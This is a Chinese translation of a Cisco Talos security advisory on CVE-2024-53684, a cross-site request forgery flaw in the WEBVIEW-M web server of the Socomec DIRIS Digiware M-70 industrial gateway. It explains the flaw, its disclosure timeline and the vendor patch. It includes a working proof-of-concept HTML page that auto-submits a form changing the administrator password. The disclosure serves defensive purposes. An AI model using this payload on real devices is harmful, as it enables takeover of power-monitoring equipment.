思科Talos披露Socomec M70 WEBVIEW-M跨站请求伪造漏洞详解

本文详细分析了Socomec DIRIS Digiware M-70 1.6.9版本WEBVIEW-M功能中存在的跨站请求伪造漏洞,该漏洞可使攻击者通过恶意网页诱骗已登录用户执行未经授权的密码修改等操作,实现权限提升。

TALOS-2024-2116 || Cisco Talos情报集团 - 全面威胁情报

漏洞报告

TALOS-2024-2116 Socomec DIRIS Digiware M-70 WEBVIEW-M 跨站请求伪造漏洞 2025年12月1日

CVE编号

CVE-2024-53684

概述

Socomec DIRIS Digiware M-70 1.6.9版本的WEBVIEW-M功能中存在一个跨站请求伪造漏洞。一个特制的HTTP请求可导致未授权访问。攻击者可构造一个恶意网页来触发此漏洞。

确认受影响的版本

以下版本已通过Talos测试或验证,或由供应商确认为易受攻击。

  • Socomec DIRIS Digiware M-70 1.6.9

产品链接

CVSSv3 评分

7.5 - CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H

CWE

CWE-352 - 跨站请求伪造

详情

DIRIS Digiware M-50/M-70网关作为工业电力监控系统的接入点,为电气安装中的设备提供电源和通信连接。它还包括一个名为WEBVIEW-M的Web服务器,用于远程可视化测量数据和分析能耗。

Socomec M70的WEBVIEW-M Web服务器使用cookie来管理用户会话。会话cookie的SameSite属性被设置为Strict,这指示浏览器不应在任何跨站点请求中发送此cookie。通常,这是一种有效的CSRF防护措施。然而,WEBVIEW-M的实现未能正确处理未附带会话cookie的请求提交场景。如果已登录WEBVIEW-M的受害者访问了一个恶意网页,浏览器将正确地不传输sessionid cookie(因为SameSite属性设为Strict)。当WEBVIEW-M Web服务器接收到此恶意请求时,它会将其当作已授权请求进行处理,从而导致一次成功的跨站请求伪造攻击。当浏览器发送恶意请求时,它将在已建立的、经过身份验证的TCP会话内发送。尽管恶意请求中不包含有效的sessionid cookie,WEBVIEW-M Web服务器仍会处理并执行该请求。

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
<html>
<body>
    <form id="csrf-form" action="http://192.168.0.4/Authenticate/?ModifyAccount" method="POST">
        <input type="hidden" name="REQUEST_ID" value="1">
        <input type="hidden" name = "DEVICE_ID" value="0">
        <input type="hidden" name = "USERNAME" value="Admin">
        <input type="hidden" name = "OLD_PASSWORD" value="">
        <input type="hidden" name = "NEW_PASSWORD" value="CSRFAdmin1!">
        <input type="submit" value="Submit">
    </form>
    <script>
        // 页面加载时自动提交表单
        window.onload = function() {
            document.getElementById('csrf-form').submit();
        };
    </script>
</body>
</html>

如果以WEBVIEW-M的"网络安全用户"身份登录的受害者从同一浏览器访问上述HTML页面,管理员用户密码将被更改为CSRFAdmin1!,从而使攻击者获得管理员用户的权限。

供应商回应

供应商公告:https://www.socomec.fr/sites/default/files/2025-10/CVE-2024-53684—Diris-Digiware-Mxx-Dxx-_VULNERABILITIES_2025-10-01-16-43-14_English_0.pdf

时间线

  • 2025年01月13日 - 向供应商披露
  • 2025年10月01日 - 供应商发布补丁
  • 2025年12月01日 - 公开披露

致谢

由思科Talos的凯利·帕特森发现。

comments powered by Disqus
使用 Hugo 构建
主题 StackJimmy 设计